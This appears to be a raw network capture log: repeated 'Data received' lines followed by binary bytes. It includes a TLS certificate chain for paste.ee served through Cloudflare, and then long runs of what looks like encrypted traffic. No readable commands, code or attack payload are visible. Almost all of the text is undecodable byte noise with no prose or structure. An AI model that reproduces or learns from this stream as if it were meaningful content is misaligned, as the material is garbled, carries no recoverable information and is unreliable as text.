Data received —”½0‚¹0‚`  ~±s0j±2}P;0 *†HÎ=0J1 0 UUS10U Cloudflare, Inc.1 0UCloudflare Inc ECC CA-30 200806000000Z 210806120000Z0m1 0 UUS1 0 UCA10U San Francisco10U Cloudflare, Inc.10Usni.cloudflaressl.com0Y0*†HÎ=*†HÎ=B·Á"v,Æü"…’“²5ŠÿÈN›î+Ê\¥}ȂšþtõódA jz1w0’ ÏbëF’Ó(¡,öÁk0£‚0‚ÿ0U#0€¥Î7êë°u”gˆ´EúÙ$‡–0UƒjD89󖠐07<´håë\06U/0-‚ *.paste.ee‚paste.ee‚sni.cloudflaressl.com0Uÿ€0U%0++0{Ut0r07 5 3†1http://crl3.digicert.com/CloudflareIncECCCA-3.crl07 5 3†1http://crl4.digicert.com/CloudflareIncECCCA-3.crl0LU E0C07 `†H†ýl0*0(+https://www.digicert.com/CPS0g 0v+j0h0$+0†http://ocsp.digicert.com0@+0†4http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0 Uÿ00‚ +Öyôñïuö\”/Ñw0"T0”VŽãM3¿ß / ÌNñdãsÄX;,F0D W#P ¼¡ýZ¹öúcÖ)XÞ÷åP0ë½Ä9G dÚn®$ÿ†$¿>Ï9ûiˆËŒõ‰`+›nØÒ¯Üuv\ÜC’þæ«ED±^šÔVæ7ûÕúGÜ¡s”²^æöÇÊsÄX;\G0E p1ÍF†û1Ƶ;ìl|‹U½tøî`P'Hð°ÎpÂcd!§N/Ÿií_õ»$‚\6½€ëB ò K ÙÖüYþ¸ »Á0 *†HÎ=G0D ÓšH>©ˆs¤_|×Jfc„¿p'ñÅCÚd ZÌ2mó Œ—uø#Ž‡È»€©ò:CÖoüDŒÔ3hd–=Ñ0‚Í0‚µ  7‡d^_´Œ"Nýí <0  *†H†÷  0Z1 0 UIE10U  Baltimore10U  CyberTrust1"0 UBaltimore CyberTrust Root0 200127124808Z 241231235959Z0J1 0 UUS10U Cloudflare, Inc.1 0UCloudflare Inc ECC CA-30Y0*†HÎ=*†HÎ=B¹­Mf™ FìÑ*P/4}-–¸ˆ8›…_¿»MïaFÄÉsÔ$OàîÎl³Qq/jîL wÓrb¤›×£‚h0‚d0U¥Î7êë°u”gˆ´EúÙ$‡–0U#0€åY0‚GX̬úT6†{:µMð0Uÿ†0U%0++0Uÿ0ÿ04+(0&0$+0†http://ocsp.digicert.com0:U3010/ - +†)http://crl3.digicert.com/Omniroot2025.crl0mU f0d07 `†H†ýl0*0(+https://www.digicert.com/CPS0  `†H†ýl0g 0g 0g 0  *†H†÷  ‚$Ý°*ë˜Ö…ã9M^kW‚Wüëè1¢We¾D8Zw¹ÏBÆᒤãE'øG,h¨V™ST­ž@ÁÐ¶× 8HlP,I[d‹ÌH0.Þâ›I"À’ ^–’”Õü ÜVl咓¿zÀ7ã…Iú+át9·Úó¢WX`O̎”üF{41>MG‚:Ëô‰]ïM nœ‚$Ý2%]xQ= 5#/eoœÁÑC×Ðó1gY'ÝkÒu “$$Ï)¾æ#ør?éÈ$DSz³¹ae¡LÆHÉuc‡pERƒÓ•Eêðè1~  þ>ݪ<^tÒ¬±
Data received ’
Data received ŽAb3W»<;ÍçÂóAÅ=Š¤½¬¤Cg ü§†G!äñú-´©Û{*=ýh-Ú}"­Õ ýŋ›3Ušüu%;l7G0E!´ðÆí2¹¿»—Ùô良i*$ÃU"Ô.º×Œ_z± 1_"çêoA òEŽeÀ‰Ã¢íZYtŠ8”j †éH'
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ½¦ó7»Æà©zΪ êt^„ˆ Oñëò!Ôxjt©NpšÊØÿ*ìíúïÜ
Data received p
Data received cä±zÏè<ÝèÑó4ß¾ ž%ðÒJt™µu?’C RÛ㛝 ]ü̬ôú:º¤È¤‘0ò]N7Y®°ú“p±ijÌɾôNìãv‹®~Kt~@j;F±‚½ùαvJ{CM£ŒCalÚìžäŒ œëê•ü)Tf6@ÛRSȓj¹ V]7©o»NÔð7"㨟°ýßJ©ÑG$ð'*Ñ®n®ú–FÜ!³—¬=†Hqî*¸f3÷­Öoî ý̋Á&丄 1=¨¬Æ%ÑcÀ¹åW¤m¡UÒZ"Ž$´f3•u+²i˜ßžmèÞ]…6M‹3ʺ>~#҆1 %‘†=òQ’"Á±Š¦~*Ô -fŸ/ˆÆöS9’aþ2׎ë]`·­þÍi–lòüf¤ÔŒ-…®_¼.k\º´‘ØxÛŒâ$’ŽœBÈ1,xQˆYyL0=Á–퐛ÏXÓØDF%#…T_0„¦¬tˆ·>ÐüÁ݉2$ Ã)ØNÑXh٘ȯ=­`WVQva'ÞxHG3KþI*å=Ò?Æ­A3 ÑM/ð„#Aàû¦¤q’ž¸¸´ÝrŽ$ê÷#p¼_ºr®Ò£‘öÿ€|4åÝiÎ+ßù22Y|çMYج±k0 Ž·¿‘§Ç\(\êDÏ ){g8Np5uúß+,ö¨Ñ«¢ªŽ00¦à‡ Ì @moxÏGîÊvš/Iqk7’½‘Ól·5ï}5Å †ñŗ­W4UŠ:]âsA„„š€М•–HçR™‰¸áûL 5¦7˜‹"X¨;ÑøiÇǝ¾ÀYXh‰}K mĨòz•Ò‡.¾û¦´“SØ¡»0ßIN4¢Ç¶l`ø<û¨û.Zfp½5ކJBdé‚"3’Q–ô‘Z'vvó~Jfƒ{+òê|è&$)ԔC\Dbýò<¢ûÕ¯ ±¹aÈrB ç1üw‘âÐ5ƹZÃ^ÜioMEAúóüP™À©PV`%Ißá{϶%3I:5YÜU‹†ŠvÏÒø¸I¹8è<Ò<ήEÿ&?ºæ4] ᘁÊt梚+Ïõí‘Ü@¾7s¨R¥RŒ=LœÙcE¯–qÞBó”ÉkD ?ʦeÿÊÞË÷XËø( ƚšø™ææ(AuŒì±¿)@³1î¬Gh¶äz’>íqB^m-t)aMöô~ùé²&GŸï ²õ!?g‡3ÝøhBT[rer¶>ˆŽ>»PRóç3µ%yâ-»e=<SiltKYÒªäá{KÞ¾kY¼j9ª›þ~ÿøÓыöœÝ,xÙ@‹»O u/Õ<1ÝÐåû¿4f;äI{@øŸÔ†vdƒñíT.òýaã^ìì^Ëc žTü1‰0ÍÉcúLE¹oŠ:_£p¶Ô ÷½—_š—e™UŸIùØL´¹b¶×]¿†ÕǒƒË`<JÛYY\¡·~Lö?¦v’b‡›²N† ™;ýìû§h×Õ³¢<ΰl²Þ£XöÀ݈WgÛ̬ »³8^´ös¦¶”Ÿì¶cØ5s`Ý#íFÔf r?÷Ðhi›ñâÜxW³-1ˆÝ-½(9”- ªÀår:‘uòáûXËPôR͚¢8ÇanÔ+?þ•k´þx‘u•âQb,­Ó¤38”¡ÔPK™¥n…;Õ$Yâÿ ¦¹íÎlՐ?o~ÀSYÕg»<«L=G§5ƒ¹¤€¡þ0ª‘#ZÀˆéwWB½d /Bª1øm×Õ Ç̆™SUGŽ5®6
Data received Ð
Data received ¢ L*ñ[,$sAþSÀ¸E‡l¢ õOÅ¡vý”`ÆHkªÙ“Ó錟úu‰ðÒR°¢)“;Ì:!QŸÏ¸+am ºúß;×öÒ{ÁB7ºC@”,уË'\ÓcѳKÓË{°d®ÿA’hÌô£eMÎH‹«—\7Mt•uC0“d˜èÖõ¦(Ùod"xõQ¶é¦é“ùû ú–DÎ ?‰4_žY­ŸZ·vb,̟eØJ š£êŒô·Ñ vò™µÛ1‰}A®?Uîþd
Data received °×N(ÐR8±Wúº‹ÓgbÛ+ލ¹Ÿm}RUÑRx~Úê½ãÀÀ0äQFµmÚè~¨Þø8Ğšæ6>°v7Xޖx «v„*G,‹èÂ¥g³CÀsX“3øÈA҃?¢•™ßD­ÌŸ™¼µŽbÑTe·üÆ°LE8~„骴îv"þ‹ÎZiO„/ɤR0É´ˆåûbVêtåKoJ›ÿKãr†È1ê¬õυvûœ ‘û_2.?Ä]4ì}FÆò»L¯ÝÖä5œÍ…é°ªâ-˜1<À *Iaa8ÆoB8wtA­â:p~?Ã#Y˜ÝMõ.°?^oسj)h©RÐ µ Ä j=- “G?ZŽ 4õµJÎ∠p?Œºۀç=ÛàÌÉ÷¼7¢œkQQ‚G!“Æ|!ÿ—;&¼Fä‡F´ßtqå•ûUW?³°gV*ÓvcÐ Ù/ÏÞܶƒÑ y°Ì›e#r<ç˜fpʇRSæŠ8Ñ'íѓT¥+l ŸË®ª¬Ùócœ¦Q´Z•ÑýƒåÖËzÝ0A´9*N‘K’ÜðVq” ±³ŠKž×ڐoån«°ô*‡3:\ÁõúµzŸ/­¼À±„ kÛgõ =ŸªCB'¯^ì8ýï]çî:ÃÛ5ðœ[ƒ8oQ6L‰ý±ôD?[²HW®Xœ| ÐÛÓ,Ç"‡âýÃ’­±Í-m¾Köî£WD÷L&íì0?sÁŠ˜évJëØX"h¯’±Ÿñ'õŸ+Ò øÛÆÀ…U3zè²®ã/Š‡ù.küo&LÐIF/ égyÅ*õ\·|_ˆHLêS0¯*ÇÑÀfùÝTy—hDEI@Žã«¤ïñZ>ŽXg ”ÛÀ.¸)(ßeðŠ?èïGõWt(Ÿ[cξá B`1 ää„ y—Œ…›# §Åæ›ëR?úÓØßtFÄ{e‚u`lc¡‚==[1­]ž–0÷—Ò)({ӆø)>7™(+ºÀ1tÔãKY:2ëùÖ~?¾Î»j}H¸è ûÿÍüMÉ!´¿¸K• n^DI¤“ƒáeçÚZgO¥ðÜd µ0g» xÜüš>Y”ÈŠ£¼û>ÁŽ|ðI˜ôÓ+¼Æ„{bÍ>Ðҍ.ÛDKéRg»!XT+©›zM¼“ ±JzÏ]ЁLïæÜ8J|1 „.ô'„Èš«ïò¸`,Ì´·q"Ÿ ™D:ºàVArPcbtv€ÒÀ_9hÀùüœš#ÄÝçžVê¯,А°!·0gÎL›ÀpE0•ˆ µÔ‹áu´Š±pXŽFÌV†”‹ëÌìˆt–¯Á} ¸â¼Ì)ù>¯Žéœ[ú¡s¹“n8ì‚×+à4¾a®þ&4Q"v‰h$^'o£C'®”Qda¹Ð~^ùԘu:¨Øª–¸mÛ¼œ¸½ôŽ©ÿ²iú%‡Ã6pÃ{9*³l\z·ÊóP9üE¯« “¹,‘–[AÁ½—ºH 3]LQ„°UÝ.9²c š¥é|Po§Ž)å‰T¯†÷R0 gJ¿!}zÍ T}áƒézcÁm†ëX>Ì;wé.Jš>¿Ó£H»q°$!â¨Q²Ã÷8  ›™7@«V¨P#`kC*çŽÜ{܆`–†½Ñe¤Ózs ¦ôj8„^l2– ùƬuyaˆ\L ED:ˆ”Ó—\ª¶¹Ö¤øŸlå F=aÛÉùâÏ8kÇO1õƒ#Z]‹'0fÿ÷q5ðf,ȅÏç÷zDÆa7
Data received ¸›< )²¿Úû¨™ ¥œDj³SǸ7ÓÀd…su{]„*>.ü}J(ÿ²ª—7‚¬Ædœ¹fÎYڝä•P¸HevlÙi¿}7w3ÁîûÏ-£¹Â¾³ÕGfܚÍÛ:?Ê`k]UÓPõқ<À¿-AÌtÝà£IĀvq ~˜¶Au@Ü:»³3Ã&êÆæɳ§ïáÌO´ië´- Žk«‚¥˜ìíx¸–ƒÉ²Ží‹§Zµž8eÒ8—ÞVÈ'ՒÇ[šÖZO·âiïy(ªQMaIþcx«A¿2¼šWåf0î"ƒCæëÖ¸lËÊh®8Î䆔"x®¿âËÌޝÜ©›ª›öޞÎïËÈ`]õܛ“¼»«yÒ¼Óàξœ›÷Ü3œŒ³Ï»$ÌGŒ{/Zí6h¬‹t7#Áaz½põS®ß¥ ›™¶¾ ‚‹5 Z}’BÂ1xÍF“U{…åÖ XîÜõ"¶ ñó‚Æ.=9&,PC³|bw1q'=ÖPjn‘U€Ô\”Wuœ4Z˱x=4õ)9swÙeÊ=‚=³ë§³ :óiŽïë.-³l«8'ëd<‚ÏBp4Å=ŸnâM•ššþïÁ|ÄHêªÊ]Q´¤¬§éV÷ÑTOT'TˆtfÜǖ¢92t± æÛÅje1Qã1´W¨@öÌD×DÌBtAO§W¤á*‚Ûþ¤ø¿]:MaB(›¡µIãÅ/ZÖ?¬ê—fý2?0ÑnBZ9N_v>¯š•1øµ¬ÁÒ։ _6'h”ÆSº7¦uðƒ=~ؔb¿W´Žl#eb•WòDi‹†1Àø*ÿ˜\˜-@ÀJ3ñ›™óŸŸ³Lō\¥ÁJ½Ñ÷~iÀ¨'R>ÿexÈÀ5sLEŽÎ–C÷sf#̝püw|µËv¾‹È(Ié–}éyMŽ¿É‡<x¯PG®F4wÆì×?_–ä/œãg"X‡tûmjùÞ]9#وç}gàŸáx՗ˍL9‚ÿvØàR²Lr]\Èê€Mµ›y»‘©$Ä×|cÅ<קܺ®Éô‚qÍtôæVŠ=:º/ ¦0¡ÆýÍ(/|¡³‹ ¡Š?U9fƯ¬jøÝÞ OKk³k­6t$xQä$·»²„°™ªäë=®ÝÕ$D©´º¹qlL7âž"¾üD$|qh2ñÞ5דhô È÷Â簆Phïο¨Æ YüþxúD^é¾ÃÕ¡ªQ½É쎩µTG°ßϺF  ™žrvÑ*,¸æ3ØËÏmj f•ÃùØEÒ¸¦m´Å€e Îw›cßÏ%Ðz0‡×¢'͆B³ýÐ;u]D ¥ä²>¶S–ƒI¨š“²†L;;M]F;Ê\kìlj —ûå؄¤~Ì4Ó)â˜=í¼7œ|%ð7ñiÃBÀ_{î(/ù uÔ³H9ìäå ´Ö §+™tÚÙ×ÅÚ¬tü×NÆáæLßúDyFnVC¨ßEÝÞ/Gëéq»)Òî¡è—nkM ürٖ0%ŒsãzÕ`ýš±ôãβa&KG ”pˆØ¢ýlæÄ pi±%Š&[n<T¾ÈÔa¤ãűL°N–‘“ @ ÿ`Mo§¬ý°‡–/¿w„[›5tS®P/‘'RûR§#ðkïsÃK§"6Òbÿ‰ÏþÜwî¥àn‹° ¬"¢á*‹@…¥ÚÓöé¬ïHtãUmtr>˜)±šxÅvùp.ë(s·MÕb”¥!Õ^Õ*Ϫ–˜ˆJ±EÞ‘Ic£
Data received h ™ø¾MæÊ;š´ºkδŽßþÁ «1›Xþ±~Ú»•¤I¶Ôˆ¶YïZÀ–}Š\èy4+V>cæœ`v-s< Ln^ª¯H›º.³¿•¥>#ÅÊgEÑæúE¹¸­q©Ó¥ÁӁq†‘µ‘K3œ,[> J ߺ?ÂÕQ\‰6|åUôôeð@I3·Ü,2þ¢{‡7™)Mì¤Rãý±Å½Þ,ÕK¥XÊu[³pNæÔ½”v^/VË/Edj“ I¯í¹É¸½›S¶À ‰ÀT‰ægÛg43 §jÁ•)7@¢M~:ygou¯½—Kç%»y*R߸¡Sú& ¬qÏÚ nÐ5gR\[žÐÄvi©`â–@ÔB¨ÆÎÃ-˜y´³t™\¶}DÝ^Që ³Ql—-¸Š”$x°¶û³³»’VPÿ.Œf¼TfÙFK>Z»vôÌCz²xŠrKUÃLMÛâ`õ¤™ÂHý£L[ò£¢§~APk~fNó˜ò {n¬×* n|úÎç¡Ù+É%·s® € šD.Ï°5|-‚G(ím+•‚ÜBùAÿàzú$Ìä¦9ôo Ÿ¯À;y”T”ož”p”™*ŀ¹»«(žâ7±(Ÿ¬Kšõ46VôfÎ"~þ²CЈ%Ä«ïǾo”G¾o{”èÛ×õhÏi=køÈ㮤@TPsHÃý؃J3b®VÉl:öa(鏍ãÒxUÍjصx…)¡v͘ì1dujé'Agu‚¢]N˜‚ ¥Cœð±´pË%.-ΎQ·¯‘“ÓÄð#û輡‡ó®ni×Énfr©“`ùh«PçY' 8fvg½"bѦ2P14ÄCC¢D\ø_Tcdù"¹öWU^òäA6MÖ;Ø/ª¼;ÝUky£&^bO¦¨"¹CeYža$ބP†ï\t bp æà¦lò}Ôüç´ ¸È(¹—UHeÂrroïChtž® \ԃœoVç /ô‘Ë+¤Æ_u,~çüe«DHÄÒùYU³ œÏöŒÏ7?9•ˆ¿Š¦øÕ>UNù e¸ÿ!º•ÌJܵ:¿&#š+ ”T.åÇïOSe„?ŒbµŠTÑ~£Ñ‚äÌ`ë*G‹Nw<¶<Ō $ª² `: ¢ðºIØÞö«µY9 %ƒq贙6dm}4T²².ñ¡Üæٖ ´Õ‡@²§ñý6õ"0Á㏌”<+4¡ªÑk„{]ü8]ùÌí]¹Ø#ua¾…jÁ —Ë>½i˜8©ß2Y†L(9çÖ'åêDúOÝÝÂÙ¿}ª,q¸¨¯E²Ø©Õ€T¸hR:Ø$žÐ…NÊTœ†˜»Èôéà~ˆ^㬞g8S˜”Ñ ~±û.ÿï ¤-—Ø©_µÚ:K—µbý³1µø·DøÕ „Ë%| xÑh.&ý y=O™óøì=¥j'O¶›û¹ø›™ˆ¸ìE ß/°h°X~Ý zÄ:¥È”ˆü Öh¹y竨hiÚTÒ ½&¡øÕïCMÜ8ÚK}úŠ\2'ù ª™¤|0>YÀ,Ž+4öm'ÿ‡¥^Þ¹v;µfz§²_ôWŸ¢»V –·‰·î&Ì¢È&¨ŽlvU¢à䫈þlÙª´@Àt7ÀûͶ?L6,ƒÿèó²:ê„&wŸ½RO4¯Ôž¢¼ÆEO‰ïèG~nÅ/ Åà ºû9|äLìç)p²2í(s”&ÙÚ¯~Éé¯m`¤ 4vø›ÜÅQ¨3äÙÂçÖеäO*Ôÿ&òá™Ñì³·šö0x/õC®U
Data received Ö×etãlú½VåkäÀ‘õµÞ˜5¹Oi«çߗ:À“"Ö+À@<²@î%C•ìg'ælÛ¬ém†T¡EªãÚ˜DI‡zu|ó–ü[ÕÉVǎ¹÷ty€ûèÇ´÷¨± Ý:ÎȁòT:»;Å0,£D«Z©ŽÄ“Fì’SX_éz`QqBCàLŸgþžÁR:27 £±8¾ù×"ÐÃÈ»‰{øì<b·=lj`í«ÙFí™`€š Ĝ{9Í~B´ØeOp¨²añaŽÝê*{üÜ5Nõ¹°ÓƦ+\g>փˀýl=‚³½, „¢‹D$ÂÕ›’#ĘçéCöG!$àþD Ç×ÊÎg;Ñ@×´­t͞þ.qn:8ŸCp§yç’Zþk¡œ¢7–›,ª/ÂÐRàIša=ôºtÂ2ÁvõŒßâ‚뱪—NæF6gw}åÅ @õÕ±¦µrT9'_ï~ç"c˜¥úV,‰+W ÒÏýÅ¿RH®'WõSQM>Ûìo?U *Ö@°¦K¢\ yœíÀr•˜·ÀÓÛÒÔ9ò¿'Á©p¢õap'$r,ò·p‚Ñԋd Ò¾œ³IR‰Ë¥Âg˜o´_¹L劋\Né¯Ý¥ý'+'x.™A⧟pñƒ1Å '›E}qûm˜˜3Ž„™>ؚÍø$’vU|¨¯ äw·oZ¦ya¬¨¿¸ÆQíבqáØzä°3Ǒ×øà[¸28€ök“‘påhU¿jÜÿCŒ„ ‹K_ùýü]›æw{-âZݘÐ^'ú©]ìQôêR£:Ëø³µÌr‰×RDÇ1kUÊÓ#)pµæp( ûyÐ>Zö紑̪¯Úm$¤Ý¤]-4ïto\o¡Aa{‡C€(Ä©rW·0³xD’+çw¥ul⠜ƒº‚³0P.»öAr­àÈq³Ä¾¼`’UXÊ}êå$º”˶×Ԇûy™ióù0ëlÉ ÒÍÛëPzœÐ9a¡mÈ9¹ÍM [J˸ ½±KDr]¹Ò¸¨ä*,J‘縣ïå~½ ß«­ËX‰†FÈé÷wêg ^!ñQQê„_éVôÙÛМ:„îæ-’ ñ”èO8¼}áÏõœ* µ]jnöÉ ÷FŠÅ ŽÊW[ Ƽ‰§¨xh~7d0Ïσ¸óÕ‚;âl‘YÃ6÷؋ÐЃ»cjFN§‘•X¤¶ËÒͨå:yné«Ä›Ú!rX‹ëű%…QÔgW#€ŒSà cµ#¯¬Æ/¬½Õ—j‰Z·w®ÙçkŽA†GR¢Ž]kœ_ðröÏ +™3—Š¯€‰²ñÞd<_Ïö¢IHÝÏó3e½¶œ]öÂZGû¿’þ#ÄŸoÊ«¡Þ&̎å.Wú?ؼ@^‘dšS¢†wÙâ›þ¯Æià^<dÒuø’…Ï|q {š ¥ØU¢ð¬n×`7B«÷"ˆ+Xÿó(VÛê<¸Võ±z}ŽÿÄ»„›ABdæ²+é =ôþÎ`Bi`lèÀ¡âAs´ÞÃA%¡z r£Òš÷ˆk¹AéôŸý­ªŒºy(kÙÛlºóŹgƒn7jcÓÆįf´öG5›„ÊZ¨¨>FzÎÆF!´r?dÜ&i‰dMêV́ço2…'¬e–f¹b‰y;96k§Un#½‘Û˜¿{*ótdâÑ“B1ÎØÅ¢Z6te¢°¿æÓ®Æ-‚ŸƒhUž)rªÿÚfa5¥ë\B÷ލÈ͖Å3)¥´ô˜"uRvr×
Data received @sÂW :0 3U×?/€º*åï÷뜽yhøÌíg4u"<ÃñT­ ÎBÓ:gµª y³ÇT¹b*J•³JœùøÄ3µ][–TœóÒ@àôß`àëVÝM`”´ÂÓ£=ð¹-•âBiænÀpK„S?֍WoÚMr5Á¾öXÍaj½¬e3f¼@ýØÕzŽkÊÐ¥#Ò×cU 5ñJzýOéáç¥ö5æ dÖçáïÆ?ù%óLñß:Ÿpä¾Ì â.í0ûœ8†Ð$Ž³“LbaÎöÜND“uá9Wìq®PÉ­ Ö¼þ±­­øax¯z«NË"7”É8§úšÏú[ΐîkFM¹þ6¢$THj g“ §u³\jsÉéÝ®õY •/±ˆn?Y¦ß€¡û4+Ñ¢êK3ÛìÅáUcŠe,➰²MÁ“ƒq®y«€Ý`oÇ@N`m`÷ÕÈAë–"ÄõZm2uühëѧZЄÄ|GD΂ÈÅ(Óïø"pš,ªÒ ü‰’BÿµŸÇ=^ ËϪ=r?)qê)tCžF+>ªÉ/ÒèË©^ØüY÷XÛC ÃJŠœ8Gèü~ԀûmAÐí›ð29ñ ÉŸÆF2[?(_™1!±8CnaòËx]éÉP1ÑéMÜ>ûS´&Ä=“¶uåÞ¼(‘!K5 Q|ïے„!6­yN.Oá)Þb7G‚™äeêþ)ÛÁu^$ô¿09Ü~ U?7ÝËA ¸Úi…1ùLyÏÌ!0“m}#¾^NÉàDOXë/¼-¦å€!Ó>0ð=\¸ µA›ño•ýö„eèKÈÂÇ c£{¾Dñõ E܋ÕW]}¥•ž¹Í±dN’¬G?{Ôðou54|Å?Ü®êþï)Š#Õ©å+í[öøÆ·Â&•dSªæŠú­ ©š›·°lñ~†’Q‹Ä)ÁWµØ4äÿ 5eeÙvxîŒkp•èú «)Ge˜\(‘[ªÞ÷¼;€ ^Ç(£Ñù2ÊÍ~i\V/„]Ðl‹I1© årÇîF"nu4¡p‹à§w[™P\¢*¨ª1¸ºô<]X͍ióÒØ𦓬Lš<‘B'ý~û«ÉuzèX`äUaìð~OøÙzÇтã MF: .›ò­8kÜ;”EŠ¯„•änþC=ê›@PL4`J¬ì¥½ôˆD”¨H>Oü ÅeM“PÌàƹ¸‚Ę:ÓO<ސMkÞx§”\o¿fÍoM(럎Fé'¡RÃSU<(ä)³d¢¼6vWÝñJW—a‹fª, Â3ڔ´eË óø?ZU¹Srý2ÜZ²°R;W$,…î(¬!(£—û—fbyNõB¼0¸‡:ª¨F&õüQ\Me®ü/D 0xämô7?_éuhÛH´?E²æ/Ý:Þä%‚Ä")·ùè$_%Æ÷ëVØ AôâKÖüØñ %¯ˆSLùh“R¹ë¨ðRäÓR‡eRÆL´²^íiÌç5D µ{Äji²¶ÉO(ªŽ(×كÙ43ˆ„¡W@Āº´ÛŽ2³Wï¹JÑ4D¥ëÇ£‰xÌ›N÷ˇ¥â”R<>èèa¬Þû…u21ÿnÀVò4¹íãxdµ!ÿAA³±“gÁ:3 m=ˆ:“¹µTU+²~Ä"ïQ0ˆýwM5ñ˜Óg9q¾v ŠÐøùÈF˜÷‰Ë‘Q¬2_¶¿×Øe‰÷ƒcròñŒÇ­Mtwí’Wõ/Œ,"8øÇûÈÅZŽCÏ2Ÿ@"ºXä¹O©ñΊª²Gª¢±øªKqvë³?Ì4ëKY
Data received zŠ/G·«?wE·qðçwQóéHp oæ&§ ü^BÙùšã½[ýýāí›ÿƓ¦q|Ò@FPãg¢ä¢a¥‘ °ó«ØY$MZAâ\.ZêhsñD`Áo”\‰žCKi‘Q̊µ™w—Ë ifÊQÚN«D”6‡@Æ7E\oÐûAH„…“ðšUTd $˜"HÑæ©©¬‘õFÅg[~á ßÇ<˜dLy¡h/.ä|¨Yß+&V ï+hF®A9+‹Dò¹¦‘BÖ¤–ìѯûÖ÷„Oó%€<TŸ•>{+J”¨°ç‡ú²Ñ˺[“ÅÊKÔjê /&Ö}5=YbêEÃÌ ¼§ì0Çʋ=aªܨ•´ŠcރÊNQA>+T ºÞ¸ˆŒ¯žh ¬Ê˘2…&³ÂAtÄÓ 1¨Âj£¶î5’ŠñA Õt½Sïóo—3¿t&ìv™ì´ÿ sOaåÎÔVÚCõ¦™ôÊn±ZÛIq î!‡eìÎ.„ÍCPóq½©½)اSü[q5³ÎG¡}ut ‹±× Ë>ã»ôg!)‡_ÇùÊâòôL]Öê·äG¹˜¥ ŤbÃàRR¤HfîïOXÛY5O_Ž>eå,sETÊA®F ÂI†lp_?”"¡8@›.àé-°‰Ðäx[ ™P8;|®d€@#Ån;5B›(¾6!#ù†GŒ ÒaRô-à¸Úݦ6³þQ’² ®ø~繂ËI¥®û‹É]ɧßV‰ >/ž¶s†œìÎ'pµú3,œ½Il+]DŽÃT¼;(+‹w}šîX±®(èjWGö&s)BSÉ.W=?dþüµh ÈÚ»2”…¬\ê›Ç¾QNh/øÕ¢²Ufµ&mèT=ú*[ùS¯‡Y%óʋ)0ƒ±Òƒx…\%qPÜ£ù`‹u-òô$x~*飦‚ á§Äb‰Ç±y7\ÐÿÉÌ|9ê:õiDla&Î;6±!M‰9)è‚ÆŠòEúF CøQRv%^¶Ÿø›Ÿ˜S©KÏ$ç÷½ZÞH†Ï¶Y‘ÛŸ÷ÔAOï" !´êN‰ø®5öÅB®h1»8ŠöF9ÊFZ…é>ÊàiL¢)¦p0öñ–£°×`6'_óÆ"á¯5©±õ'K–0Õ ÃW„ÙÎ2sÕÈYÓZf¹pßŸ‘«Ér͂|~¡¤Y{°bJá·Óží ­nALʲUGÜuvî eå®n=:¼" ùè)€¼ùB„‹C½.Ç–ãí|N FC >á¶À ¢ØnflÜ×kâçvå”A =v\@^틀ÂkÑâÔ£×yŒHÔÙéüÅqÈô¾è7ç{0¸péïwߙy6ª®E©ö#Ãò Jh˜ ‚ñóü‘AvÊõؗú`ÒÓ¸±"ôßZq3Ò¦ÅöG‡¾»„ÞciþÔË,7Ù ¦Bih6²<¶à!0• ¬–UŸÓôååìŠùW‰Ä‘’À¼õ#È=£Å9[Ú¬ ­ý©qÂÝyH›"@ÒÝ;åÞçùÕëgvc½•ãýFz…”–ÜVZµ]gèK9góNJ¹®©¸¶}ÿx ŸŸÿ…sd}˲bŽ7Ho-.oPߍ°øÂjFHáôŽF°×P¢Ñ)ï„T½aº÷Ï[YJ`k¢¢MžïWþS4$uÿfdÔ ûÀ—øûbÁúÔ¥C¨LYëü·OàäÆ?]ÿáÿ 9%§y½>[Å#8a›U'âR1ö’ Õĸ ‚Ò½·Á›¦¾Qf¾Oqώ A©—Ên /QnÛ£fŠ<‰xÉö
Data received ŠûO«åÖ°1‹-œWA£äN‚«vâ÷ eð>2ª ¼ÛÊÔ¶YΣÎiÁ)3õÔyJˠԄ¬²­ ™&‡øá‰2Q~X³…@ùƒïé‰û+îÙHÚÑ@•`/7ÍfuÖʓAbäÊë< †’¨¢+tȦŒJٔ¥è~YñZ:÷ø‹¯¦?ŒÅ%8øBçì-)úaWú‚Š ž‹éCk*ƅx‚kGW 6!hÈßÊpQ¥9ŠO£*ÈüŸÄÙ35¨xÀ&·¯©Z¬Ø¢±)÷Ø%9ÅoôñîJ×хډN‰oÁªcFeægs›v FJÉÞMaɵŸ}úsøÕ±'0Ð?âj°¥0á0p±€#Ímë$x~UyK¢Å„ŽH¶`©Ö° Ëśmµh@˜w©¥ÏõÀ¼B(JåõYL(¡™bl§öEW³˜{BTüX‰­;A-»FåY µ¯m$Êxsîâg…³½ä·&›‰Y™¶½8wðËh1„<~~¹en@·ˆíäëYH@ŒÄ5éÑ_1Nrçqdaë@fâ“F×,ÉÞÙ¡Z<OÆ=Ñ[ÈVTús¯Í"jž²Äo¸>NÍÝÆß'«@–[Äþq¯ŒàHçCÇ[ׇ ¢ ²ØÁlÓ^qü×.‘­êèTOøq¹”;Ë']¼‡õÍ\Ž«Îx÷§39ŸfaúšœZâh<â.¢ëkT=N$‰$DÒ^ŘñM°]|¡Pû2Õ*ÅÍÃewçºU q h¿Z{jyޘŒ"á(Ã'سVî%±Øf{ Ôø®ò¡žáü~è¸ûÞ̶åÆô›**Ù=?낝ËÙCíþ·WÁcÚÌ´²'»ÎÞ{p‘2+™|çÒÆ¿ŠÛòzFÍøžçMfr@{ÇÃ8Œ*DtBF1äYýDƒD´6z? ïdXD¸.˜IHÚè]% о(­÷Z˜â)™‘3H6¬„9DX¼ê 5bá)ÿ@²pnáڗ} ´´iycö"hzhwvå›TVó%|üóÛæ‚([Ê}§ü8Xâôõ´àJ⩇”M¯§ ~A£¸êBÁÃPOì´:‘ÒQ»ÿãf²Û‚öä.5ŋvõjÁvˆ`.ç6]AZ;‡Ï«Ud¥ZÑ^EƒÑ™þŸÎ“gÛ¡fNg—`V.Im´:OwE”•;ö|NJÛÎëaº ½Œ‡½¦×wŠœ´s×͖À›¸\"~ÿ“u³…IõՄwÁK˜0 ý~‡Í¶-陬߱ÞWl̕Ð^&¤$ÕM˦­>ÙæïË òЫ'-£™“qÆW¥°Š à›Á ·/k2ÞÆW„'ëéìÌR-•­Çdý²„ý»ÐfÍNÎAæ4g̍uó;,]Zõ­~´ƒòq¸ÑRQè:'}Æø¦ÛlàYy7Ìô+œì™Úœd±ZT­9WšZ9‚xë“ûuœðÖ¦ °‚Ú¦ÔMEO/d¡$j0¢”Ú ∹R¡€×Lw½Ã¯í;’a¼Öòhó4,¢qYµh ¿4z¯ÒÙái ¾á‹åó9é×>1Bâ,–óµ¾—¾è¥Êo} 